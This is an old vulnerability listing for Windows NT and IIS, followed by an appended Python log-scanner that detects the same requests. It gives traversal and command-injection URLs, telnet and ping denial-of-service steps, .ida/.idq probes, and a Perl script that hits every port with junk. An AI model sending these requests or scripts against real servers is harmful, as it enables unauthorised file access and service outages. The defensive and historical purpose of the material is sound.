NT vulnerabilities and descriptions (English)

Posted 2011-1-13 17:12:25
Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.

A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------
Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.

If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------
Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT Resource Kit):
/*begin poke code*/

use Socket;
use FileHandle;
require "chat2.pl";

$systemname = $ARGV[0] && shift;

$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
# walk every port; $knownports skips the three known problem ports
for ($port = 0; $port < 65535; $port++)
{
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    $fh = chat::open_port($systemname, $port);
    chat::print($fh, "This is about ten characters or more");
    if ($verbose) {
        print "Trying port: $port\n";
    }
    chat::close($fh);
}

/*end poke code*/
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------
Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------
Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

STOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found'. Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server.
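A defender-side check for the request shapes listed throughout this post, added here as an example and not part of the original posting: it scans web-server log lines for the '..\..' traversal, the '>' output redirection under /scripts, %0A%0D in the path, and the .ida/.idq probes (including the very long 'ida' URL). The rule names, the 1024-byte length threshold and the log lines are constructed assumptions.

```python
import re
from urllib.parse import unquote

# Constructed detection rules for the request shapes this post describes:
# ..\.. traversal, '>' output redirection under /scripts, %0A%0D in the path,
# and .ida/.idq probes. They are applied to the URL-decoded request target.
RULES = [
    ("path-traversal", re.compile(r"\.\.[\\/]|[\\/]\.\.$")),
    ("script-output-redirect", re.compile(r"/scripts/[^?]*>", re.I)),
    ("crlf-in-path", re.compile(r"[\r\n]")),
    ("idq-ida-probe", re.compile(r"\.id[aq](?:$|\?)", re.I)),
]
LONG_IDA_BYTES = 1024  # constructed threshold; the post cites ~25 KB of '.' before 'ida'

# Common-log-format request field: "GET /path HTTP/1.0"
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify_request(raw_target):
    """Return the names of every rule the (decoded) request target triggers."""
    target = unquote(raw_target)
    hits = [name for name, rx in RULES if rx.search(target)]
    if target.lower().endswith("ida") and len(target) >= LONG_IDA_BYTES:
        hits.append("long-ida-url")
    return hits

def scan_log(lines):
    """Return (line_no, hits) for every log line whose request target matches a rule."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m:
            hits = classify_request(m.group("target"))
            if hits:
                findings.append((n, hits))
    return findings
# Constructed sample log lines (not real traffic); line 1 is benign.
SAMPLE_LOG = [
    r'10.0.0.5 - - [13/Jan/2011:17:12:25 +0800] "GET /index.html HTTP/1.0" 200 1024',
    r'10.0.0.5 - - [13/Jan/2011:17:12:26 +0800] "GET /..\.. HTTP/1.0" 200 -',
    r'10.0.0.5 - - [13/Jan/2011:17:12:27 +0800] "GET /scripts/exploit.bat>PATH\target.bat HTTP/1.0" 200 -',
    r'10.0.0.5 - - [13/Jan/2011:17:12:28 +0800] "GET /scripts/script_name%0A%0D>PATH\target.bat HTTP/1.0" 200 -',
    r'10.0.0.5 - - [13/Jan/2011:17:12:29 +0800] "GET /anything.idq HTTP/1.0" 404 -',
    '10.0.0.5 - - [13/Jan/2011:17:12:30 +0800] "GET /' + "." * 2000 + 'ida HTTP/1.0" 500 -',
]
if __name__ == "__main__":
    for line_no, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {', '.join(hits)}")
```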